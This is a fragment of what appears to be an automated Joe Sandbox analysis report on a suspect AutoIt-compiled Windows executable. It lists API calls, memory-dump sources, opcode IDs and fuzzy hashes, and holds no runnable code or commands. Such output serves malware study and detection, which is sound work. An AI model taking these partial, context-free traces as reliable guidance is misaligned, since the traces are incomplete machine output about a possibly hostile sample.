                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 4c29a61aabf3baf3cb1f9009fa66a87829b6fde86c0e34a8e179630dd272e91e
                                        • Instruction ID: 2a286c5bc1776b2cf22e1e08bf5d0d36af69421a952da712895f9b3ab39dd379
                                        • Opcode Fuzzy Hash: 4c29a61aabf3baf3cb1f9009fa66a87829b6fde86c0e34a8e179630dd272e91e
                                        • Instruction Fuzzy Hash: AF127C71A083419FC724DF28C484B2ABBE5FF84314F04895DE9998B292DB71ED49CF92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF1BF4
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF1BFC
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF1C07
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF1C12
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF1C1A
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF1C22
                                          • Part of subcall function 00BF1B4A: RegisterWindowMessageW.USER32(00000004,?,00BF12C4), ref: 00BF1BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BF136A
                                        • OleInitialize.OLE32 ref: 00BF1388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00C324AB
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID:
                                        • API String ID: 1986988660-0
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BF556D
                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BF557D
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00C285CC,?,00CB8CC8,0000000C), ref: 00C28704
                                        • GetLastError.KERNEL32(?,00C285CC,?,00CB8CC8,0000000C), ref: 00C2870E
                                        • __dosmaperr.LIBCMT ref: 00C28739
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C62CD4,?,?,?,00000004,00000001), ref: 00C62FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C63006
                                        • CloseHandle.KERNEL32(00000000,?,00C62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6300D
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00C017F6
                                        Strings
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C66F6B
                                          • Part of subcall function 00BF4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EFD
                                        Strings
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00C32C8C
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00BF2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF2DC4
                                        Strings
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3908
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00BF5773
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00C34052
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00BFBB4E
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        APIs
                                          • Part of subcall function 00B608E0: GetFileAttributesW.KERNELBASE(?), ref: 00B608EB
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B611E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesCreateDirectoryFile
                                        • String ID:
                                        • API String ID: 3401506121-0
                                        APIs
                                          • Part of subcall function 00BF4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E9C
                                          • Part of subcall function 00BF4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4EAE
                                          • Part of subcall function 00BF4E90: FreeLibrary.KERNEL32(00000000,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EFD
                                          • Part of subcall function 00BF4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E62
                                          • Part of subcall function 00BF4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4E74
                                          • Part of subcall function 00BF4E59: FreeLibrary.KERNEL32(00000000,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E87
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        APIs
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: f4fc1c9a3381447ac0a67cf00eb5742e2c2031c2a180729a8ce349c6485bb683
                                        • Instruction ID: e8c73aa81f6bfbf1a392c553ca3f0fbe8b6de3e3d1e890549f0f74587526c07f
                                        • Opcode Fuzzy Hash: f4fc1c9a3381447ac0a67cf00eb5742e2c2031c2a180729a8ce349c6485bb683
                                        • Instruction Fuzzy Hash: 0111187590420AAFCB05DF58E941A9E7BF5EF48314F144059F818AB312DA31DA25CBA5
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BF543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00BF9A9C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 12fd7f14d853ffceb545f555d9d9676c1c61b5fc70b0256fe572e0f48bef0ec1
                                        • Instruction ID: 99db8eafe928743fce384acfadcc7161857b071eed368bf737759b2823726c25
                                        • Opcode Fuzzy Hash: 12fd7f14d853ffceb545f555d9d9676c1c61b5fc70b0256fe572e0f48bef0ec1
                                        • Instruction Fuzzy Hash: D11148312047099FD720CF09C880B76B7F9EF44764F10C46EEA9B8BA51C770A949CB60
                                        APIs
                                          • Part of subcall function 00C24C7D: RtlAllocateHeap.NTDLL(00000008,00BF1129,00000000,?,00C22E29,00000001,00000364,?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?), ref: 00C24CBE
                                        • _free.LIBCMT ref: 00C2506C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction ID: 70251e5ba34e539e5b4dd265d327a89170a9ca166a0b2873d2117b6396394f1a
                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction Fuzzy Hash: DC0126722047146BE3218F69AC81A5AFBECFB89370F65051DE194836C0EA30A905C6B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction ID: 7d26543496eafd179b8e6bc32addcbfc798519b4386b4762efb75f13de92b630
                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction Fuzzy Hash: A6F0F432511A28EAC6313A6AEC05BDA33989F53330F100715F822D25D2CB70E986B6A5
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00BF1129,00000000,?,00C22E29,00000001,00000364,?,?,?,00C1F2DE,00C23863,00CC1444,?,00C0FDF5,?), ref: 00C24CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 085f21ea766d519263c443111cff625a93f9efedb36e2e2536262abc586cd23e
                                        • Instruction ID: 47ff6755fcb62dd7d85fc635e456c31d8a705c868eb4cadde33e95c68512978e
                                        • Opcode Fuzzy Hash: 085f21ea766d519263c443111cff625a93f9efedb36e2e2536262abc586cd23e
                                        • Instruction Fuzzy Hash: 80F0E03160263467DB295F6EFC05F5A3748BF427A0B144115FC2596A91CA70D90156E0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00CC1444,?,00C0FDF5,?,?,00BFA976,00000010,00CC1440,00BF13FC,?,00BF13C6,?,00BF1129), ref: 00C23852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 58591f3ea0f9b9cd32582a4aa2045bf46671ffa670d69832104c40c064c175f8
                                        • Instruction ID: ed0a357db3f0cc65766d06c8a4c7133cb11f20b6eb4f62d5a2d7c2886776c2d9
                                        • Opcode Fuzzy Hash: 58591f3ea0f9b9cd32582a4aa2045bf46671ffa670d69832104c40c064c175f8
                                        • Instruction Fuzzy Hash: 7BE0E5322002B456D7212667BC04BDA3759AF43BB4F1A0022BD259EDD1CB69DF02A2F0
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4F6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 401e86668dabcd254b87e5995720805efa3cfdd54103a38d7740a590f7535cef
                                        • Instruction ID: 322cfa3537d4f6f90419bcdbff78af5645450cf91d835293ebfdc02cd89ecd37
                                        • Opcode Fuzzy Hash: 401e86668dabcd254b87e5995720805efa3cfdd54103a38d7740a590f7535cef
                                        • Instruction Fuzzy Hash: DAF01571505756CFDB349F64D4D4927BBE4EF1432932089AEE2EE83621CB31A888EB10
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF2DC4
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: bea365db0de79afe0b0176d6634edb0f4b87443b62371386b6754fe140c18e25
                                        • Instruction ID: 98577555a9bfc918dfec5859af6ef045d59055ed71acc8cf0bb76bde620bcc1e
                                        • Opcode Fuzzy Hash: bea365db0de79afe0b0176d6634edb0f4b87443b62371386b6754fe140c18e25
                                        • Instruction Fuzzy Hash: 6BE0CD726001245BC710D6989C06FEA77DDDFC8790F0400B1FD09D7248D970AD848650
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction ID: 6229a17924c7b0dc9465800ea71fdc05a6eba4c88c540a175d344110636cd8a7
                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction Fuzzy Hash: 01E04FB0609B005FDF395A28E8917F677E89F4A300F00086EF6ABC3252E57268459B4D
                                        APIs
                                          • Part of subcall function 00BF3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3908
                                          • Part of subcall function 00BFD730: GetInputState.USER32 ref: 00BFD807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF2B6B
                                          • Part of subcall function 00BF30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BF314E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        • Opcode ID: c92947ef240af03c6db13f683ecd11b690b1f4948d8da20ece0f2c6efd74f804
                                        • Instruction ID: 9b883afdb3955d77f29fa176ccf96643079bc8ceb1ebc76791ed32d9f43d5804
                                        • Opcode Fuzzy Hash: c92947ef240af03c6db13f683ecd11b690b1f4948d8da20ece0f2c6efd74f804
                                        • Instruction Fuzzy Hash: F6E0863130424C06CA08BB759852BBDA7D9DBD2792F4415BEF74247163CE25894E4351
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B608EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction ID: dc1baa595db7d6cac7c2ae912de9f7af81b68e6c776b30a2b7e691a143fdd786
                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                        • Instruction Fuzzy Hash: BAE0867152520CDBD710DBBD8C046AA73E4D704310F104A98E41AC31C1D5388D409654
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00C30704,?,?,00000000,?,00C30704,00000000,0000000C), ref: 00C303B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 3b560321c6702031c7fa8f74af0696acc11d0b06b74a24b4128b2b3a193463b5
                                        • Instruction ID: c85cdda59c6f427dc074e000c23ea09f36724e6df564e033fe8caf26a874a325
                                        • Opcode Fuzzy Hash: 3b560321c6702031c7fa8f74af0696acc11d0b06b74a24b4128b2b3a193463b5
                                        • Instruction Fuzzy Hash: 31D06C3204010DBBDF028F84DD86EDE3BAAFB48714F014000BE1856020C732E821AB94
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00B608BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction ID: 37216c9a6c83ca3dba256b56da8e1a36cc5b739289037b9a486d61598e784105
                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                        • Instruction Fuzzy Hash: ACD0A73091620CEBCB10DFB59C04ADB73E8DB04320F104794FD15D32C0D6359D4097A0
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00BF1CBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        • Opcode ID: 4eec05bd58567c80d7d2f921206f98b879c2d90daea07447835892761a8e73da
                                        • Instruction ID: 722c25bb1edfa7aa1650c9672a259ed874836b1df6b280f64b742a9c332dcf77
                                        • Opcode Fuzzy Hash: 4eec05bd58567c80d7d2f921206f98b879c2d90daea07447835892761a8e73da
                                        • Instruction Fuzzy Hash: E6C09B352803049FF6145B80FC4AF197754A348B04F084001F609555F3C3F11410F754
                                        APIs
                                          • Part of subcall function 00BF5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00BF5773
                                        • GetLastError.KERNEL32(00000002,00000000), ref: 00C676DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast
                                        • String ID:
                                        • API String ID: 1214770103-0
                                        • Opcode ID: bb74d3b6f08d57516257d5c206c578a0c4293798ff16d457d27407176f95775d
                                        • Instruction ID: f1aaa572d6802a8e493d978eebd191fe0494a55fba775198a189276577eef1c0
                                        • Opcode Fuzzy Hash: bb74d3b6f08d57516257d5c206c578a0c4293798ff16d457d27407176f95775d
                                        • Instruction Fuzzy Hash: 5C8191306087059FC724EF28C4D1B69B7E1BF88354F044AADF9965B292DB30ED49CB52
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
